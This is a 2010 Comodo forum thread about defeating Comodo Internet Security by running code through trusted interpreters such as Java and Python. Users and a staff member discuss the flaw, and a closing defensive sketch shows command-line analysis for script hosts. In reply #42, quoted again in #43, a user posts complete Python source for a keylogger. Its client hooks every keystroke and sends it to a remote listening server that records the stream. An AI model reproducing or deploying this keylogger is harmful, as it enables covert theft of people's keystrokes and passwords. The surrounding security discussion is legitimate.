Author Topic: How to kill CIS easily  (Read 25638 times)

Offline Dennis2

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 9684
Re: How to kill CIS easily
« Reply #30 on: May 16, 2010, 05:40:33 AM »
I have no idea why you think you will be banned; you have not broken the Forum Policy.

If you look through the forum you will find numerous posts like this. Everyone is entitled to their view; whether it is the right one is another matter.

Thank you
Dennis
Moderator: Aims Forum a friendly place. Any concerns? Please PM me and/or review the Forum Policy 2012Updated.
System: Centos 7.9 x64, APF, HTTPS Everywhere, ABP, NoScript
 Fedora 35 x64, APF, HTTPS Everywhere, ABP

Offline brucine

  • Comodo's Hero
  • *****
  • Posts: 1533
Re: How to kill CIS easily
« Reply #31 on: May 16, 2010, 06:21:04 AM »
Quote
Why? Because it is like a firewall: you allow an application like firefox to access the Internet. OK, it's great, firefox can access outgoing 80 and 443. But if I want to make an addon to spam people (like some others make a bittorrent client), as I can use port 25, I'm able to do it; your firewall won't protect you.

??

My only allowed http ports for firefox are 80 and 443, enforced by a specific firefox rule.
I don't see how firefox could connect through pop/smtp ports 25 and 110, and my mail client does not allow html view by default: whatever html mail there is gets "quarantined" from the text message itself, and needs my assent to be launched by the browser, then using port 80.

Offline fOrTy_7

  • Comodo's Hero
  • *****
  • Posts: 599
Re: How to kill CIS easily
« Reply #32 on: May 16, 2010, 06:58:14 AM »
Quote
Hi all,

As I said before, I think using the safe list can be dangerous because the HIPS doesn't handle it properly, so we can use them to do what we want on the computer with all rights.

Today, I will show one way by using Java. You can download it and try it (if you use Vista (I didn't try on Seven) you must run it as admin with the command java -jar kill_cis.jar). You need to have installed Comodo in partition C:\

Just execute kill_cis.jar and reboot your machine (warning: as it works, use it on a test machine only). After restart, check CIS.

It's really a very very very very very very stupid method that works on Online Armor too, just because Java is considered a safe application, so we just have to make a malware in Java.

I've just tested it on a Windows XP virtual machine and it works too. I haven't got a single popup while executing your PoC. After restarting the virtual machine, cmdagent.exe doesn't start since it's an empty file (0 bytes long), but I still get alerts from CIS. Those alerts got a little weird, most applications are unrecognised, but CIS still passes CLT tests flawlessly. I wouldn't say you killed CIS; it's altered but it still works. The question is, can it be further modified so it would work like a rogue internet security, or would self defence prevent it.

I agree that better control of safe applications might be necessary, but there always needs to be some trade-off between security and the amount of alerts. No one would use a HIPS which would pop up an alert on every mouse click event.

Btw, Diagnostics couldn't repair the problem it found.


Edit:

It seems that, before CIS detects that there is something wrong with its initialization, it is fully vulnerable. And after running the PoC it takes unusually long (up to 10 minutes on the virtual machine) for CIS to determine that it couldn't be properly initialized. Well, malware won't wait that long to infect the targeted system. And unless you're using some third party AV which could catch that malware, your system will be infected.
Considering these facts I must agree with Shaoran that his PoC kills CIS, because those few minutes are just enough for malware to do its work.


Why is there no developer comment regarding this issue?  ??? 88)

[attachment deleted by admin]
« Last Edit: May 16, 2010, 08:11:58 AM by fOrTy_7 »

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #33 on: May 18, 2010, 09:34:52 AM »
bump
Don't worry, be happy ????

*No longer active*

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #34 on: May 19, 2010, 09:11:34 AM »
bump.
C'mon devs   :THNK
Don't worry, be happy ????

*No longer active*

Offline darcjrt

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 466
Re: How to kill CIS easily
« Reply #35 on: May 19, 2010, 03:53:52 PM »
Quote from: fOrTy_7 (Reply #32 above, quoted in full)

Those pics do not look pretty. Hope the devs saw this and are already working on it. I use Linux, but I install and recommend CIS to my clients!!!
Best Regards,

J

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #36 on: May 20, 2010, 08:11:54 PM »
Bump
Don't worry, be happy ????

*No longer active*

Offline evil_religion

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 475
Re: How to kill CIS easily
« Reply #37 on: May 21, 2010, 09:40:23 AM »
I advised long ago that D+ should treat scripts (*.bat, *.vbe...) and Java programs as their own processes.
It's really a design flaw; other HIPSes have this feature.

Any developer comment?

Offline egemen

  • Comodo Staff
  • Comodo's Hero
  • *****
  • Posts: 3380
Re: How to kill CIS easily
« Reply #38 on: May 21, 2010, 10:14:52 AM »
Hi guys,

We are looking into the issue. If there is a bug we will fix it.

Thanks for the feedback,
Egemen

Offline evil_religion

  • Malware Research Group
  • Comodo's Hero
  • *****
  • Posts: 475
Re: How to kill CIS easily
« Reply #39 on: May 21, 2010, 11:17:41 AM »
It's not a malfunction, it's a missing important feature.

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #40 on: May 21, 2010, 07:07:05 PM »
Quote from: egemen (Reply #38 above)

Thx Egemen,
May you please also take into account my suggested possible fix? You could sandbox threat-gates by default, a bit like GeSWall does (or even Sandboxie if you configure it). Here's an overview:
http://www.gentlesecurity.com/overview.html
Don't worry, be happy ????

*No longer active*

Offline vix123

  • Comodo Loves me
  • ****
  • Posts: 123
  • I don't use an antivirus that doesn't pass VB100
Re: How to kill CIS easily
« Reply #41 on: May 25, 2010, 12:54:49 PM »
Quote
As I said before, I think using the safe list can be dangerous because the HIPS doesn't handle it properly, so we can use them to do what we want on the computer with all rights.

I agree, and that's why I always disable "Trust applications digitally signed by known vendors". The simple fact is that many of these applications (such as Internet Explorer or Windows services) have been compromised through buffer overflows in the past and will certainly be compromised in the future. Comodo would still trust them as they run malicious code.

Quote
Today, I will show one way by using java. You can download it and try it

Didn't work in my case. I am using normal restrictions for Java which prevent it from (among other things) changing protected registry keys. Why would Java be allowed to do that? Defense+ properly caught and logged the attempt. (I am running XP SP3 as Administrator.)

I believe it's a configuration issue, not a real flaw in Comodo.

Offline Kyle

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 3679
Re: How to kill CIS easily
« Reply #42 on: June 19, 2010, 08:13:37 PM »
Bump.. Just an update.  I'm able to host a server and successfully connect with other PCs over the internet and send information, without CIS alerting, using the method being used here in this thread.

EDIT:
Can keylog and send info across no problems.

Server (your PC)
Code:
#Key Logger
#Server
import socket
import logging
import sys
logFile = 'c:\log.txt'
logging.basicConfig(filename=logFile, level=logging.DEBUG)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('',6666))
s.listen(3)
conn, addr = s.accept()
print 'Client: ', addr[0]
logging.log(10,addr[0])
print 'Listening....'
while 1:
  try:
    data = conn.recv(500)
    if data:
      print data
      logging.log(10,data)
  except socket.error:
    logging.log(10,'END')
    print 'Connection at ', addr[0] ,' broken.'
    socket.socket(AF_INET,SOCK_DGRAM).close()
    sys.exit()


Client (the PC of the person you're listening to..)
Code:
#Key Logger
#Client
import pythoncom
import pyHook
import sys
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
addr=raw_input('What address would you like to connect to?')  
##You don't need to ask the user, this was just to test, u could enter the address here and it wouldn't ask.##  
port=input('What port would you like to use?')                                  
s.connect((addr,port))                                                                

def OnKeyboardEvent(event):
    s.send(chr(event.Ascii))
    return True

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Btw.. Online Armor doesn't alert about this either. If Python is considered trusted, you could run whatever the heck you want through here..
« Last Edit: June 24, 2010, 10:35:14 AM by Kyle »
Don't worry, be happy ????

*No longer active*

Offline lordraiden

  • Computer Security Testing Group
  • Comodo's Hero
  • *****
  • Posts: 921
Re: How to kill CIS easily
« Reply #43 on: September 15, 2010, 12:38:59 PM »
Quote from: Kyle (Reply #42 above, including both code listings, quoted in full)

Bump!

Now all the malware in the sandbox can go to the internet with only the protection of the Firewall.

An option to automatically block the internet access and alert when an application is in the sandbox would be nice.
« Last Edit: September 15, 2010, 02:14:58 PM by lordraiden »

Offline Citizen K

  • Global Moderator
  • Comodo's Hero
  • *****
  • Posts: 26177
Re: How to kill CIS easily
« Reply #44 on: September 15, 2010, 02:37:16 PM »
Products like CIS do not prevent the user from making mistakes. If this could be installed by abusing a running program it would be a problem. But this looks like the user starting a script.

For those who care to read the manual of v5, which is now online as well, you will find the following under Execution Control Settings:
Quote
Do heuristic command-line analysis for certain applications - Selecting this option instructs Comodo Internet Security to perform heuristic analysis of programs that are capable of executing code such as visual basic scripts and java applications. Example programs that are affected by enabling this option are wscript.exe, cmd.exe, java.exe and javaw.exe. For example, the program wscript.exe can be made to execute visual basic scripts (.vbs file extension) via a command similar to “wscript.exe c:\tests\test.vbs”. If this option is selected, CIS detects c:\tests\test.vbs from the command line and applies all security checks based on this file. If test.vbs attempts to connect to the internet, for example, the alert will state ‘c:\tests\test.vbs’ is attempting to connect to the internet.
Quote from: egemen (Reply #38 above)
Looks like Comodo fixed it....
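The manual's "heuristic command-line analysis" is the mechanism this whole thread circles: a HIPS should judge the script or jar handed to a trusted interpreter, not the interpreter itself. As an added illustration (not CIS code; the per-host option handling is my assumption), this Python 3 sketch resolves a command line to the file a policy decision should be based on, and shows how the same command line is allowed when only the host is checked but alerted on when the payload is.

```python
import ntpath

# Script hosts the manual names (wscript, cmd, java, javaw) plus python.exe for
# Kyle's PoC. Per host: options that consume a value, and options whose next
# token is the real payload. These rules are my assumption, not CIS's parser.
HOST_RULES = {
    "wscript.exe": (set(), set()),
    "java.exe": ({"-cp", "-classpath"}, {"-jar"}),
    "javaw.exe": ({"-cp", "-classpath"}, {"-jar"}),
    "cmd.exe": (set(), {"/c", "/k"}),
    "python.exe": (set(), set()),
}
TRUSTED = {"java.exe", "javaw.exe", "wscript.exe", "cmd.exe", "python.exe"}  # stand-in "trusted vendor" list

def split_cmdline(cmdline):
    """Split a Windows command line on whitespace, honouring double quotes."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline + " ":
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    return tokens

def resolve_subject(cmdline):
    """File a HIPS decision should be based on: the payload of a known host, else the executable."""
    tokens = split_cmdline(cmdline)
    host = tokens[0] if tokens else ""
    rules = HOST_RULES.get(ntpath.basename(host).lower())
    if rules is None:
        return host
    value_opts, payload_after = rules
    args = iter(tokens[1:])
    for tok in args:
        if tok.lower() in payload_after:
            return next(args, host)   # e.g. "-jar kill_cis.jar"
        if tok.lower() in value_opts:
            next(args, None)          # skip the option's value
        elif not tok.startswith(("-", "/")):
            return tok                # first positional argument is the script
    return host                       # interactive host, no script given

def decide(cmdline, heuristic):
    """'allow' or 'alert', judging the payload (heuristic) or only the host."""
    subject = resolve_subject(cmdline) if heuristic else split_cmdline(cmdline)[0]
    return "allow" if ntpath.basename(subject).lower() in TRUSTED else "alert"
```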
